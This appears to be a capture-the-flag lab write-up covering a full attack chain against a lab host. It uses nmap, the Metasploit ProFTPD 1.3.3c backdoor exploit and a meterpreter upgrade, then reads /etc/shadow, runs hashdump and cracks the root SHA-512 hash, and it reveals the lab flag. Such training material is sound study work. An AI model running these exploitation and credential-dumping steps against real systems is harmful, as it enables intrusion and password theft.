# 🔬Hashes Dumping

## Lab 1

> 🔬 [Password Cracker: Linux](https://attackdefense.com/challengedetails?cid=1776)
>
> * Target IP: `192.75.64.3`
> * **Password Hashes** dumping - `/etc/shadow`

### Enumeration

```bash
ip -br -c a
	192.75.64.2/24
```

```bash
nmap -sV 192.75.64.3
```

```bash
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.3c
MAC Address: 02:42:C0:4B:40:03 (Unknown)
Service Info: OS: Unix
```

```bash
searchsploit ProFTPD 1.3.3
```

![searchsploit ProFTPD 1.3.3](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-2998d65d88935f13fcae33706703189283a81a08%2Fimage-20230323104830486.png?alt=media)

### Exploitation

```bash
service postgresql start && msfconsole -q
```

* Postgresql is started to store all `metasploit` loot and sensitive information from the target machine - [Metasploit - PostgreSQL Workflows](https://docs.metasploit.com/docs/pentesting/metasploit-guide-postgresql.html)

```bash
setg RHOSTS 192.75.64.3
search proftpd
use exploit/unix/ftp/proftpd_133c_backdoor
run
```

```bash
/bin/bash -i
```

![Metasploit proftpd\_133c\_backdoor](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-b93f99778471aa898a2e10eb4692ccaa08a7d09e%2Fimage-20230323105525516.png?alt=media)

* Upgrade the sessions to a `meterpreter` session

```bash
# background the session with CTRL+Z
sessions -u 1
sessions 2
```

![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-07c290ece0b18a509d58c4673b8e1aae28ba43a1%2Fimage-20230323105845671.png?alt=media)

### Hashes Dumping

```bash
cat /etc/shadow
```

![cat /etc/shadow](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-74e09f7997eafd7475c48d7e617ff56d9bf53322%2Fimage-20230323105952352.png?alt=media)

> 📌 `root`:`$6$sgewtGbw$ihhoUYASuXTh7Dmw0adpC7a3fBGkf9hkOQCffBQRMIF8/0w6g/Mh4jMWJ0yEFiZyqVQhZ4.vuS8XOyq.hLQBb.`

* Gather Linux Password hashes with `Metasploit`

```bash
# background the session with CTRL+Z
search hashdump
use post/linux/gather/hashdump
set SESSION 2
run
```

```bash
[+] root:$6$sgewtGbw$ihhoUYASuXTh7Dmw0adpC7a3fBGkf9hkOQCffBQRMIF8/0w6g/Mh4jMWJ0yEFiZyqVQhZ4.vuS8XOyq.hLQBb.:0:0:root:/root:/bin/bash
[+] Unshadowed Password File: /root/.msf4/loot/20230323100234_default_192.75.64.3_linux.hashes_660271.txt
```

* The *unshadowed password file* is a file containing the format hashed password, ready to be cracked.

### Crack the Hash

```bash
search crack
use auxiliary/analyze/crack_linux
set SHA512 true
run
```

![Metasploit crack\_linux](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-23959298c9c2cf857044e9b8202dc42d51ade21a%2Fimage-20230323110756857.png?alt=media)

<details>

<summary>Reveal Flag - "root" password is: 🚩</summary>

`password`

<img src="https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-ccb0140f5960b1ad1d6126add1cebc521823d850%2Fimage-20230323110859459.png?alt=media" alt="" data-size="original">

</details>